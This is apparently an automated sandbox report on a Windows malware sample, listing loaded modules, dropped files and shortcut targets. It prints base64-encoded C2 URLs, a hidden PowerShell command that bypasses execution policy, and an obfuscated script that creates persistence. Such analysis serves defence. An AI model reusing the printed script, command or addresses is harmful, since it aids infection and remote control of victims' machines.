            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: jli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: jli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: version.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: wldp.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: propsys.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: profapi.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: edputil.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: netutils.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: slc.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: userenv.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: sppc.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\shutdown.exeSection loaded: shutdownext.dllJump to behavior
            Source: C:\Windows\System32\shutdown.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\shutdown.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: _kjfech8_V.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\Public\computer_kjfech8_V.cmd
            Source: _kjfech8_VEX.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_V.exe
            Source: _kjfech8_VAT.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_V.exe
            Source: _kjfech8_VAA.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\_kjfech8_V\_kjfech8_Vi7.exe
            Source: _kjfech8_Vy.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\Public\computer_kjfech8_Vy.cmd
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeFile opened: C:\_kjfech8_V\MSVCR100.dllJump to behavior
            Source: Binary string: msvcr100.i386.pdb source: _kjfech8_Vi7.exe, _kjfech8_Vi7.exe, 0000000B.00000002.29808351670.000000006FD71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u92\6642\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: _kjfech8_Vi7.exe, 00000009.00000000.29777323121.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000000.29782413626.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29804465764.0000000000D02000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C51760000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000014.00000002.30390098625.0000014C517D6000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aAB0AHQAcAA6AC8ALwA2ADIALgA3ADIALgAzAC4AMgAxADAALwBsAGQAaAB0AC8AaQBuAGQAZQB4AC4AcABoAHAA')))) $GlobalListStr = [
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aAB0AHQAcAA6AC8ALwA4ADYALgAzADgALgAyADEANwAuADEANgA3AC8AcABzADEALwBpAG4AZABlAHgALgBwAGgAcAA=')))) $GlobalListStr
            Suspicious powershell command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"Jump to behavior
            Source: fodhelper.exe.4.drStatic PE information: 0xF07D2A93 [Fri Nov 8 07:38:59 2097 UTC]
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDFB67F _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,9_2_6FDFB67F
            Source: fodhelper.exe.4.drStatic PE information: section name: .imrsiv
            Source: jli.dll.4.drStatic PE information: section name: .didata
            Source: jli.dll.4.drStatic PE information: section name: .debug
            Source: WebView2Loader.txt.4.drStatic PE information: section name: .00cfg
            Source: WebView2Loader.txt.4.drStatic PE information: section name: .voltbl
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_00D01695 push ecx; ret 9_2_00D016A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD72D80 push eax; ret 9_2_6FD72D9E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD80995 push ecx; ret 9_2_6FD809A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD9A6AA push EF3FEFD4h; iretd 9_2_6FD9A6B1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD8BF60 push ecx; ret 9_2_6FD8BF73
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD99CD8 pushad ; iretd 9_2_6FD99CE6
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_00D01695 push ecx; ret 11_2_00D016A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD72D80 push eax; ret 11_2_6FD72D9E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD80995 push ecx; ret 11_2_6FD809A8
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD9A6AA push EF3FEFD4h; iretd 11_2_6FD9A6B1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8BF60 push ecx; ret 11_2_6FD8BF73
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD99CD8 pushad ; iretd 11_2_6FD99CE6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF443900BD pushad ; iretd 20_2_00007FFF443900C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF444662FB push esi; ret 20_2_00007FFF44466307
            Source: MSVCR100.txt.4.drStatic PE information: section name: .text entropy: 6.90903234258047
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\fodhelper.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\exe.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\_kjfech8_V.exe (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\MSVCR100.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\i7.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\MSVCR100.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\WebView2Loader.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\WebView2Loader.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\jli.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\fodhelper.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\exe.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\i7.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\MSVCR100.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\WebView2Loader.txtJump to dropped file

            Boot Survival

            barindex
            Powershell creates an autostart link
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.exe del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.cmd ${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}.${_/|\_/|////\__|/_|\\_}" ${\\\\__/////////} = "@Echo off`r`n"${\\\\__/////////} += "Setlocal EnableExtensions`r`n" ${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n" ${\\\\__/////////} += "cd %SystemRoot%\System32`r`n" ${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}`"`r`n"${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n" ${\\\\__/////////} | Set-Content ${/_//_//_/}function _____/\_/\/\_/\/=\\\\\\\\\\/////{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Arguments = 